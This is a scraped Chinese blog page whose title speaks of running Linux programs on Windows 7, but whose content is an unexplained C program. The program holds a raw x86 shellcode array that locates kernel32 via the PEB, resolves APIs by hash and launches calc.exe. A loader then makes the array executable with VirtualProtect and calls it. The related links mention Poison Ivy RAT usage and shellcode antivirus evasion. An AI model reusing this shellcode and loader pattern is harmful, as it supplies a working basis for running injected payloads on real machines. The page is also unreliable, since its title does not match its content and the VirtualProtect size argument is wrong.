win7运行linux程序,WIN7下可执行的ShellCode

最新推荐文章于 2022-05-27 18:12:39 发布
最新推荐文章于 2022-05-27 18:12:39 发布
阅读量129 收藏
点赞数
文章标签: win7运行linux程序

#include

#include

int main()

{

byte shellcode[] = {

0xE9, 0x96, 0x00, 0x00, 0x00, 0x56, 0x31, 0xC9, 0x64, 0x8B, 0x71, 0x30, 0x8B, 0x76, 0x0C, 0x8B,

0x76, 0x1C, 0x8B, 0x46, 0x08, 0x8B, 0x7E, 0x20, 0x8B, 0x36, 0x66, 0x39, 0x4F, 0x18, 0x75, 0xF2,

0x5E, 0xC3, 0x60, 0x8B, 0x6C, 0x24, 0x24, 0x8B, 0x45, 0x3C, 0x8B, 0x54, 0x05, 0x78, 0x01, 0xEA,

0x8B, 0x4A, 0x18, 0x8B, 0x5A, 0x20, 0x01, 0xEB, 0xE3, 0x37, 0x49, 0x8B, 0x34, 0x8B, 0x01, 0xEE,

0x31, 0xFF, 0x31, 0xC0, 0xFC, 0xAC, 0x84, 0xC0, 0x74, 0x0A, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE9,

0xF1, 0xFF, 0xFF, 0xFF, 0x3B, 0x7C, 0x24, 0x28, 0x75, 0xDE, 0x8B, 0x5A, 0x24, 0x01, 0xEB, 0x66,

0x8B, 0x0C, 0x4B, 0x8B, 0x5A, 0x1C, 0x01, 0xEB, 0x8B, 0x04, 0x8B, 0x01, 0xE8, 0x89, 0x44, 0x24,

0x1C, 0x61, 0xC3, 0xAD, 0x50, 0x52, 0xE8, 0xA7, 0xFF, 0xFF, 0xFF, 0x89, 0x07, 0x81, 0xC4, 0x08,

0x00, 0x00, 0x00, 0x81, 0xC7, 0x04, 0x00, 0x00, 0x00, 0x39, 0xCE, 0x75, 0xE6, 0xC3, 0xE8, 0x19,

0x00, 0x00, 0x00, 0x98, 0xFE, 0x8A, 0x0E, 0x7E, 0xD8, 0xE2, 0x73, 0x81, 0xEC, 0x08, 0x00, 0x00,

0x00, 0x89, 0xE5, 0xE8, 0x5D, 0xFF, 0xFF, 0xFF, 0x89, 0xC2, 0xEB, 0xE2, 0x5E, 0x8D, 0x7D, 0x04,

0x89, 0xF1, 0x81, 0xC1, 0x08, 0x00, 0x00, 0x00, 0xE8, 0xB6, 0xFF, 0xFF, 0xFF, 0xEB, 0x0E, 0x5B,

0x31, 0xC0, 0x50, 0x53, 0xFF, 0x55, 0x04, 0x31, 0xC0, 0x50, 0xFF, 0x55, 0x08, 0xE8, 0xED, 0xFF,

0xFF, 0xFF, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00

};

printf("size of shellcode: %d/n", sizeof(shellcode));

system("pause");

byte *bCall=shellcode;

DWORD dwOld=0;

VirtualProtect(bCall,sizeof(bCall),PAGE_EXECUTE_READWRITE,&dwOld);

typedef void (WINAPI *pGGCall)();

pGGCall pss=(pGGCall)&shellcode[0];

pss();

return 0;

}

Levana Dong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
在Windows上实现运行Linux程序,附示例代码
08-14
在Windows上实现运行Linux程序,附示例代码
Poison Ivy 2.3.2 win7
06-05
Poison Ivy 2.3.2版本,包含win7编译器。使用方法:生成C array格式的服务端,打开patcher,将生成的代码全部拷入patcher编辑框,点击patch it键(可能因为程序界面问题遮盖住不显示,让光标位于编辑框内然后按tab键...
WIN7下可执行ShellCode
小神兵之技术篇
01-16 4303
#include #include int main() { byte shellcode[] = { 0xE9, 0x96, 0x00, 0x00, 0x00, 0x56, 0x31, 0xC9, 0x64, 0x8B, 0x71, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x1C, 0x8B, 0x46, 0x08, 0x8B, 0x7E, 0x
通用ShellCode学习笔记——win7中获得LoadLibraryA地址
weixin_30548917的博客
09-19 400
一、ShellCode的编写 Kernel32地址的获取 由于win7的_PEB_LDR_DATA表和以前的系统有了改变,直接查询0x08方式在win7下失效,为了保证shellcode的通用性(主要是增加对win7的支持),采用遍历查询的方式定位kernel32的位置 esi=fs:0->TEB esi=TEB:30h->PEB esi=PEB:0ch->_P...
win7怎么运行linux,图文解决win7系统运行linux shell脚本的还原办法
weixin_30872577的博客
04-30 178
在平时的生活工作中,难免会遇到win7系统运行linux shell脚本的情况,我们在面对win7系统运行linux shell脚本的时候都满头雾水不知所措,其实win7系统运行linux shell脚本的处理方法很简单。只需要按照1、首先windows7系统电脑中需要安装的是git的应用程序,安装完成之后,可以在开始菜单进行查看; 2、并需要配置好git的bin,配置环境变量,把bin的真个路径...
win7下测试shellcode的方法2:设置数据段为可执行
03-01 138
win7下,通过下面的方法测试shellcode: char shellcode [] ="..." ; int main ( int argc , char ** argv) { __asm { lea eax , shellcode call eax } ...
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
shellcode是直接在内存中执行的代码,通常用于执行特定任务,如启动计算器程序(calc.exe)。在Windows 7中,可以使用类似上述的技巧来编写能够找到kernel32.dll基址并调用其中的函数,如`CreateProcess`,以启动...
Win32 Shellcode.7z
05-20
Win32 Shellcode.7z Win32 Shellcode.7z
Shellcode-Extractor:Python脚本从Linux执行文件中提取Shellcode
05-18
Shellcode-Extractor是免费软件:您可以根据自由软件基金会发布的GNU通用公共许可证的条款(许可证的版本3)或(可选)任何更高版本来重新分发和/或修改它。 发行Shellcode-Extractor的目的是希望它会有用,但没有...
ie7 0day当中的shellcode的escape+xor21加密
09-06
在这个特定的案例中,攻击者利用了该漏洞来执行shellcode,这是一种在计算机内存中直接运行的代码,通常用于获取对系统的非法控制。 shellcode的加密方法是为了防止被安全软件检测到,增加其隐蔽性。在"shellcode的...
win7下测试shellcode的方法1:关闭DEP
02-22 182
win7下,通过下面的方法测试shellcode: char shellcode [] ="..." ; int main ( int argc , char ** argv) { __asm { lea eax , shellcode call eax } ...
win7运行linux命令,win7系统Linux Bash命令的图文方法
weixin_39942726的博客
04-28 518
win7系统使用久了,好多网友反馈说win7系统Linux Bash命令的问题,非常不方便。有什么办法可以永久解决win7系统Linux Bash命令的问题,面对win7系统Linux Bash命令的图文步骤非常简单,只需要1、没安装Bash的用户可以按照之前介绍的方法,先在设置→更新和安全→针对开发人员 中选择“开发人员模式 ”,点击后会下载“开发人员模式包 ”, 2、此时也无需担心,上一步如果...
win7运行linux命令,win7系统运行linux shell脚本的操作方法
weixin_39683598的博客
04-28 153
今天和大家分享一下win7系统运行linux shell脚本问题的解决方法,在使用win7系统的过程中经常不知道如何去解决win7系统运行linux shell脚本的问题,有什么好的办法去解决win7系统运行linux shell脚本呢?小编教你只需要1、首先windows7系统电脑中需要安装的是git的应用程序,安装完成之后,可以在开始菜单进行查看; 2、并需要配置好git的bin,配置环境变量...
win7运行linux命令,win7系统32位旗舰版iso运行linux shell脚本的操作办法
weixin_32652003的博客
04-28 159
win7旗舰版是用户量最大的一款操作系统;有不少人在使用中都遇见了win7系统运行linux shell脚本的问题,对于电脑不太熟悉的朋友面对win7系统运行linux shell脚本便无计可施,其实很简单只要采取以下措施:1、首先windows7系统电脑中需要安装的是git的应用程序,安装完成之后,可以在开始菜单进行查看; 2、并需要配置好git的bin,配置环境变量,把bin的真个路径复制到环...
WinXP/Win7/Win8通用shellcode
SauceJ的专栏
09-17 1320
转自http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5 众所周知,在windows xp时代未启用ASLR(Address space layout randomization,堆栈地址随机分布),我们在编写shellcode可以利用硬编码法,将地址写入shellcode,但是这种方法的缺点很明显--不具备通用性。在xp sp
7.ShellCode相关实现
Mikasys的博客
10-28 307
0x7 ShellCode实现 一、什么是shellcode? 不依赖环境,放到任何地方都可以执行的机器码(硬编码)。 二、编写
win7下模拟溢出漏洞利用shellcode弹出计算器
天空下得大海
10-07 3332
win7 溢出漏洞 shellcode 弹出计算器
msf shellcode分离免杀技术
good good study
05-27 1908
一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀
在64位系统下用nop雪橇的方式执行shellcode
最新发布
05-30
执行shellcode的常见方式是将shellcode注入到另一个进程或者将其放入程序的缓冲区中,然后通过跳转到该缓冲区的地址来执行shellcode。在64位系统下,由于地址空间布局随机化(ASLR)的存在,注入shellcode比较困难,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值